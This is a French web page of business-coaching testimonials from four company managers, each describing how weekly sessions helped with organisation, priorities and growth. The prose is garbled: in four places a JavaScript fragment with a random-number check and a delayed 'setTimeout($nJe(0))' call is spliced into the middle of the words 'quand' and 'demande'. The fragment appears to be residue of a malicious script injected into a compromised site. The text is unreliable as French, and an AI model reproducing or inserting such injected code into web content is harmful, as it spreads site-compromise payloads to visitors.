Témoignages

« J’ai pris la décision d’être accompagné car je ressentais le besoin d’avoir quelqu’un en dehors de la famille et de l’entreprise pour m’aider à faire des choix et ne pas être toujours seul pour prendre les décisions. En effet, il est difficile d’avancer qudom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and on est seul pour décider et cela devient lourd à la longue.Je connaissais François et qudom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and il est venu à moi, et ma expliqué en quoi il pouvait m’être utile, j’ai tout de suite décidé de travailler avec lui.Ce que j’aime bien c’est obtenir les réponses aux multiples questions que l’on peut se poser au quotidien lors des séances mais aussi en fonction des objectifs que l’on a défini ensemble mettre en place les fondamentaux qui manquent à l’entreprise.En conclusion ce que m’a a apporté le coaching, c’est le sens des priorités et de l’organisation, et surtout ne jamais croire que tous est acquis. En effet dans une période économique pas si facile, il est indispensable de faire un minimum d’erreurs car cela peut avoir des conséquences fâcheuses pour l’entreprise. »

Loïc Castellarnau , Gérant

« La décision d’être coaché est la conséquence de notre croissance qui nécessite la mise en place d’une nouvelle organisation. En phase de croissance nous devons répondre à la demdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande de plus en plus forte des clients en maintenant la qualité de service et la rentabilité. Nous devons également être attentif et à l’écoute de notre équipe de collaborateur pour qu’ils se sentent toujours motivés et épanouies dans l’entreprise. Au niveau gestion nous devons suivre notre activité de façon plus rigoureuse et anticiper les problèmes de trésorerie. Les problèmes d’organisation sont amplifiés et nous devons faire face à de nombreuses demdom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes et faire le tri entre le travail important pour l’entreprise et celui qui ne l’est pas.La méthode action coach propose une méthode simple pour répondre à la simultanéité de nos problématiques et nous permet de maitriser notre croissance. En résumé nous avons souhaité passer d’un statut de salarié gérant à un statut de gérant impliqué totalement dans la gestion et la stratégie de l’entreprise.Notre coach est un ancien client. Expérimenté il nous a décrit la méthode qui nous est apparue simple et en adéquation avec nos besoins. Notre coach a su mettre en lumière nos faiblesses qui nous empêchent de nous développer sereinement.Les séances hebdomadaires permettent de ne pas sortir des objectifs que nous nous sommes fixés et elle sert également à essayer de trouver des solutions sur des problématiques concrètes de l’entreprise. Les décisions difficiles sont évoquées et les conseils apportés sont une vision extérieure précieuse.Le coach intègre totalement les problématiques courantes et devient un salarié virtuel de l’entreprise.Les bénéfices que nous avons tirés du coaching sont la mise en place d’une stratégie d’organisation et de développement efficace. Nous suivons une méthode éprouvée et simple à mettre en œuvre. Nous donnons maintenant une meilleure image à nos clients et prospects qui pourront mieux comprendre notre offre de produits et services et percevoir notre organisation plus efficace. Nos collaborateurs sont aussi les bénéficiaires du coaching, ils savent maintenant que l’entreprise se structure et quel est leurs rôles dans cette nouvelle organisation. D’un point de vue économique nous anticipons maintenant en disposant de tableaux simples mais indispensables à la bonne gestion de l’entreprise. En résumé le coaching est une allée de lumières qui se dessine dans la complexité de notre entreprise en pleine croissance.Nous travaillions maintenant plus efficacement et sur des tâches réellement stratégiques. »

Nordine Kecita, Directeur Général

« J’avais envie d’en savoir plus sur le coaching d’affaires parce que mon impression est que je ne maîtrisais pas toute la complexité du métier de chef d’entreprise. C’est ainsi qu’après avoir rencontré mon coach j’ai décidé de me donner les moyens d’atteindre mes objectifs, car le quotidien d’une pme absorbe tellement que je ne prenais pas le temps de me poser les bonnes questions ! De plus je souhaitais partager mon vécue au sein de l’entreprise pour prendre les bonnes décisions.Chaque semaine je vois mes projets se réaliser, et l’avancement de mon travail par rapport aux objectifs que nous avons définis ensemble. En conclusion je peux dire que c’est rassurant et que cela permet de suivre et d’avancer plus vite que qudom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and on est seule et que tout est urgent ! …Ce que je vois également de très positif est que cela m’oblige à me poser les bonnes questions sur l’entreprise et les collaborateurs et surtout sur l’évolution de mon entreprise sur les cinq années à venir. Savoir où on veut aller donne des ailes pour y parvenir ! »

Christine Vigier, Gérante

« J’ai décidé d’être coaché car je suis conscient qu’un chef d’entreprise ne peut maîtriser l’ensemble des domaines nécessaires au développement de son entreprise, pour des questions de compétence et de gestion du temps. Je crois à la méthode qui me permet d’optimiser mon efficacité.J’ai rencontré mon coach dans un salon et nous avons parlé de coaching car je pensais que mes clients pouvaient en avoir besoin …En fait j’ai fini par l’adopter pour moi !Ce que j’attends comme bénéfice à chaque séance, c’est de penser à autre chose qu’à l’opérationnel et aux tracas quotidiens pour davantage réfléchir sur le futur de mon entreprise, sur son développement, et ainsi mieux anticiper et me donner de nouveaux leviers d’action.Ce que m’a apporté le coaching c’est de me conforter sur certains points et de me donner un éclairage différent sur d’autres points. Ce que j’apprécie le plus est de réfléchir sur mon entreprise et ensuite de passer à l’action avec méthode et sans me disperser. »

Jean François Treil , Directeur associé